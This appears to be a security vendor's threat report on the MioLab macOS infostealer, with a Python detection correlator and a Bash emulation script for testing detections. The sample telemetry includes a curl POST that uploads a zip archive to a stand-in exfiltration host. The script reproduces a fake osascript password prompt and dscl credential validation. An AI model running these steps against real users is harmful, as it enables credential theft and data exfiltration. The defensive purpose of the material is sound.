SOC Prime

30 Mar 2026 15:41

Say My Name: How MioLab is building MacOS Stealer Empire

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

MioLab is a commercially distributed macOS infostealer aimed at high-value victims such as software engineers, executives, and cryptocurrency investors. It is spread through malvertising and a ClickFix infection chain, then launches a compact C-based binary that steals browser credentials, password manager records, cryptocurrency wallet files, and macOS Keychain data. The stolen information is staged in a temporary directory, compressed into an archive, and exfiltrated with a curl POST request to a malicious domain. The operation also includes a web-based control panel, proxy support, and API access tailored for large cybercrime groups.

Investigation

The report outlines the malware’s static traits, runtime behavior, and the broad range of targeted data sources, including Chrome, Firefox, Safari, Telegram, Discord, Apple Notes, and hardware wallet applications. Infrastructure analysis points to bulletproof hosting in Russia, repeated domain rotation, and a shared backend tied to a Web3 token-airdrop phishing operation. Investigators also extracted key indicators such as command lines, temporary folder paths, and exfiltration URLs.

Mitigation

Defenders should train users to recognize fake credential prompts, monitor abuse of built-in binaries such as dscl, osascript, and curl, block known malicious domains, enforce code-signing, and restrict access to browser profile data and Keychain files. Detection logic should also focus on the malware’s process execution patterns and archive staging behavior under /var/folders.
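Detection logic for the process-execution pattern the paragraph above points at, written here as an added example rather than SOC Prime's own rule content. It assumes macOS process telemetry (EDR or unified log) flattened to dicts with an ISO 8601 timestamp, host, user and full command line; the per-stage patterns follow the command lines this report describes (the osascript prompt with a hidden answer, dscl . -authonly, archive staging under /var/folders or /tmp, a curl POST of a .zip). The ten-minute correlation window, the two-stage threshold and all sample events are constructed values, not observed indicators.

```python
"""Detection logic for the MioLab command chain over sample process events.

Added example, not SOC Prime's rule content. Assumed input: macOS process
telemetry (EDR or unified log) flattened to dicts with ts (ISO 8601), host,
user and cmdline. The per-event patterns come from the command lines the
report describes; the ten-minute window and two-stage threshold are assumed
tuning values.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One pattern per stage of the chain, applied to the full command line.
RULES = {
    "terminal_kill": re.compile(r"\bkillall\s+Terminal\b"),
    "fake_password_prompt": re.compile(
        r"\bosascript\b.*display dialog.*with hidden answer"),
    "credential_validation": re.compile(r"\bdscl\s+\.\s+-authonly\b"),
    "archive_staging": re.compile(
        r"\b(ditto\s+-c\s+-k|zip\s+-r)\b.*(/var/folders/|/tmp/)"),
    "curl_post_upload": re.compile(
        r"\bcurl\b.*(-X\s*POST|--data|-d\s|-F\s|--form).*\.zip\b"),
}
# Stages that raise a chained alert to the top severity.
HIGH_VALUE = {"credential_validation", "curl_post_upload"}
WINDOW = timedelta(minutes=10)   # assumed correlation window
MIN_STAGES = 2                   # distinct stages required for an alert


def match_event(event):
    """Names of the stages whose pattern occurs in the event's command line."""
    return [name for name, rx in RULES.items() if rx.search(event["cmdline"])]


def load_events(raw):
    """Parse ISO timestamps so the window arithmetic works on datetimes."""
    return [dict(e, ts=datetime.fromisoformat(e["ts"])) for e in raw]


def correlate(events, window=WINDOW, min_stages=MIN_STAGES):
    """Chain per-event hits by (host, user) and alert when at least
    min_stages distinct stages occur within window of an earlier hit.
    A single dscl or ditto command on its own never alerts."""
    hits = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        for name in match_event(ev):
            hits[(ev["host"], ev["user"])].append((ev["ts"], name, ev["cmdline"]))

    alerts = []
    for (host, user), seq in hits.items():
        for i, (start, _, _) in enumerate(seq):
            in_window = [h for h in seq[i:] if h[0] - start <= window]
            stages = {name for _, name, _ in in_window}
            if len(stages) >= min_stages:
                alerts.append({
                    "host": host,
                    "user": user,
                    "first_seen": start.isoformat(),
                    "last_seen": in_window[-1][0].isoformat(),
                    "stages": stages,
                    "severity": "critical" if stages & HIGH_VALUE else "high",
                    "evidence": [cmd for _, _, cmd in in_window],
                })
                break  # one alert per principal is enough for triage
    return alerts


# Constructed sample telemetry, not real indicators: one host runs the whole
# chain in under a minute; a second host shows two matching commands 49
# minutes apart, which the window treats as unrelated admin activity.
SAMPLE_EVENTS = [
    {"ts": "2026-03-30T15:40:01", "host": "mac-dev-01", "user": "alice",
     "cmdline": "killall Terminal"},
    {"ts": "2026-03-30T15:40:02", "host": "mac-dev-01", "user": "alice",
     "cmdline": "osascript -e 'display dialog \"You need to configure system "
                "settings before running this application.\" default answer "
                "\"\" with hidden answer'"},
    {"ts": "2026-03-30T15:40:20", "host": "mac-dev-01", "user": "alice",
     "cmdline": "dscl . -authonly alice ********"},
    {"ts": "2026-03-30T15:40:45", "host": "mac-dev-01", "user": "alice",
     "cmdline": "ditto -c -k --sequesterRsrc /var/folders/zz/T/DataStaging /tmp/exfil.zip"},
    {"ts": "2026-03-30T15:40:50", "host": "mac-dev-01", "user": "alice",
     "cmdline": "curl -s -X POST -F file=@/tmp/exfil.zip https://exfil.example.invalid/upload"},
    {"ts": "2026-03-30T15:41:00", "host": "mac-ops-02", "user": "bob",
     "cmdline": "dscl . -authonly bob ********"},
    {"ts": "2026-03-30T16:30:00", "host": "mac-ops-02", "user": "bob",
     "cmdline": "ditto -c -k --sequesterRsrc /Users/bob/Documents/project /tmp/project.zip"},
]


def run_sample():
    """Run the correlation over the constructed telemetry."""
    return correlate(load_events(SAMPLE_EVENTS))


if __name__ == "__main__":
    for a in run_sample():
        print(f"[{a['severity']}] {a['host']}/{a['user']} "
              f"{a['first_seen']}..{a['last_seen']}: {sorted(a['stages'])}")
```

Run as-is it prints one critical alert for the first host and nothing for the second; in production, feed match_event and correlate from the SIEM's process-event stream. The window is what keeps a lone dscl . -authonly or a routine ditto archive, both normal administrative activity on a Mac, from paging anyone: only the chained sequence fires.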

Response

If MioLab is detected, isolate the affected Mac, capture volatile memory and filesystem artifacts, block the related C2 domains and IPs, revoke exposed credentials and cryptocurrency wallet keys, and perform a full forensic review of all targeted data locations. Endpoint detection content should be updated with the observed command lines, and teams should hunt for similar infection chains across the environment.

Attack Flow

    graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef tool fill:#ffcc99
    classDef malware fill:#ff9999
    classDef process fill:#ccffcc
    %% Malware node
    malware_miolab["<b>Malware</b> – <b>Name</b>: MioLab Infostealer<br/><b>Description</b>: Multi-stage macOS infostealer"]
    class malware_miolab malware
    %% Initial Access
    initial_access["<b>Action</b> – <b>T1204.002 User Execution</b>: Victim opens malicious DMG or Unix executable delivered via social engineering"]
    class initial_access action
    %% Execution
    execution_unix_shell["<b>Action</b> – <b>T1059.004 Unix Shell</b>: Payload runs shell commands via sh, system and AppleScript"]
    class execution_unix_shell action
    %% Defense Evasion
    defense_evasion["<b>Action</b> – <b>T1564.011 Hide Artifacts</b>: Terminates Terminal, removes quarantine attributes and applies XOR string obfuscation (T1027)"]
    class defense_evasion action
    %% Discovery
    discovery_info["<b>Action</b> – <b>T1589 Gather Victim Host Information</b>: Uses <code>system_profiler</code> to collect hardware and OS details"]
    class discovery_info action
    %% Credential Access
    credential_access["<b>Action</b> – <b>T1056 Input Capture</b> and <b>T1555.001/002 Credential Dumping</b>: Shows fake System Preferences password dialog via AppleScript, validates with dscl, dumps Keychain files and extracts browser databases, cookies and session tokens"]
    class credential_access action
    %% Collection
    collection_staging["<b>Action</b> – <b>T1074.001 Local Data Staging</b> and <b>T1560 Archive Collected Data</b>: Gathers files, notes and crypto wallets, stages in temporary directory and compresses into ZIP archive"]
    class collection_staging action
    %% Exfiltration
    exfiltration_curl["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b> and <b>T1102.003 Web Protocols</b>: Uploads ZIP archive via <code>curl</code> POST to malicious web service"]
    class exfiltration_curl action
    %% Command and Control
    c2_proxy["<b>Action</b> – <b>T1090.002 Proxy</b> and <b>T1659 Dynamic Content Injection</b>: Traffic routed through attacker-controlled proxy servers and injection domains"]
    class c2_proxy action
    %% Tool nodes
    tool_applescript["<b>Tool</b> – <b>Name</b>: AppleScript<br/><b>Purpose</b>: Displays credential-prompt UI"]
    class tool_applescript tool
    tool_dscl["<b>Tool</b> – <b>Name</b>: dscl<br/><b>Purpose</b>: Validates captured credentials"]
    class tool_dscl tool
    tool_curl["<b>Tool</b> – <b>Name</b>: curl<br/><b>Purpose</b>: Sends collected archive to remote server"]
    class tool_curl tool
    tool_system_profiler["<b>Tool</b> – <b>Name</b>: system_profiler<br/><b>Purpose</b>: Retrieves system information"]
    class tool_system_profiler tool
    %% Connections showing the attack flow
    malware_miolab -->|delivers| initial_access
    initial_access -->|triggers| execution_unix_shell
    execution_unix_shell -->|enables| defense_evasion
    defense_evasion -->|allows| discovery_info
    discovery_info -->|provides data to| credential_access
    credential_access -->|uses| tool_applescript
    credential_access -->|uses| tool_dscl
    credential_access -->|leads to| collection_staging
    collection_staging -->|compresses and stages| exfiltration_curl
    exfiltration_curl -->|uses| tool_curl
    exfiltration_curl -->|sends data to| c2_proxy
    c2_proxy -->|routes through| tool_curl
    %% Styling assignments
    class initial_access,execution_unix_shell,defense_evasion,discovery_info,credential_access,collection_staging,exfiltration_curl,c2_proxy action
    class tool_applescript,tool_dscl,tool_curl,tool_system_profiler tool
    class malware_miolab malware

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Terminate the user’s Terminal session – The malware first disables the standard command prompt to force the user into a controlled UI flow.
      killall Terminal
    2. Present a fake credential‑prompt – Using osascript, the attacker shows an AppleScript dialog that mimics a system‑settings warning, coaxing the user to input their password.
      osascript -e 'display dialog "You need to configure system settings before running this application." default answer "" with hidden answer'
    3. Validate harvested credentials – The captured password is verified against the local directory service with dscl . -authonly. A successful return confirms the credential is correct.
      dscl . -authonly "$USER" "$HARVESTED_PASSWORD"
    4. Stage and compress exfiltration payload – The attacker archives the harvested data (e.g., ~/.ssh/id_rsa) into a zip archive using ditto, preparing it for upload.
      ditto -c -k --sequesterRsrc /var/folders/*/DataStaging /tmp/exfil.zip
  • Regression Test Script: (Bash – runs the exact sequence to trigger the rule)

    #!/usr/bin/env bash
    set -euo pipefail
    
    echo "[*] Starting MioLab simulation..."
    
    # 1. Kill Terminal. Run this script from an ssh session or a different
    #    terminal app: killing Terminal.app from inside it ends the script too.
    #    "|| true" keeps set -e from aborting when Terminal is not running.
    echo "[+] Killing Terminal"
    killall Terminal || true
    
    # 2. Fake AppleScript prompt. "giving up after 5" dismisses the dialog on
    #    its own so the run needs no user interaction; "|| true" covers a manual
    #    Cancel, which makes osascript exit non-zero and would trip set -e.
    echo "[+] Displaying fake credential prompt"
    osascript -e 'display dialog "You need to configure system settings before running this application." default answer "" with hidden answer giving up after 5' >/dev/null 2>&1 || true
    
    # 3. Credential verification (using current user & a dummy password)
    echo "[+] Verifying harvested credentials"
    HARVESTED_PASSWORD="P@ssw0rd!"   # In a real scenario this would be the stolen password
    dscl . -authonly "$USER" "$HARVESTED_PASSWORD" || true   # ignore failure for demo
    
    # 4. Data staging & compression
    echo "[+] Compressing staged data"
    STAGING_DIR=$(mktemp -d)
    echo "[+] Staging directory: $STAGING_DIR (pass this path to the cleanup script)"
    echo "sample data" > "$STAGING_DIR/sample.txt"
    ditto -c -k --sequesterRsrc "$STAGING_DIR" /tmp/exfil.zip
    
    echo "[*] Simulation complete. Check SIEM for alert."
  • Cleanup Commands: (Removes generated artifacts and restores session)

    #!/usr/bin/env bash
    set -euo pipefail
    
    echo "[*] Cleaning up MioLab simulation artifacts..."
    
    # Remove the fake zip archive
    rm -f /tmp/exfil.zip
    
    # Remove the temporary staging directory. The simulation created it with
    # mktemp -d in its own shell, so pass the path as $1 or export STAGING_DIR
    # first; the ${VAR:-} form keeps set -u from aborting when neither is set.
    STAGING_DIR="${1:-${STAGING_DIR:-}}"
    if [[ -n "$STAGING_DIR" && -d "$STAGING_DIR" ]]; then
        rm -rf "$STAGING_DIR"
    fi
    
    # Optionally restart Terminal for the user
    open -a Terminal
    
    echo "[*] Cleanup finished."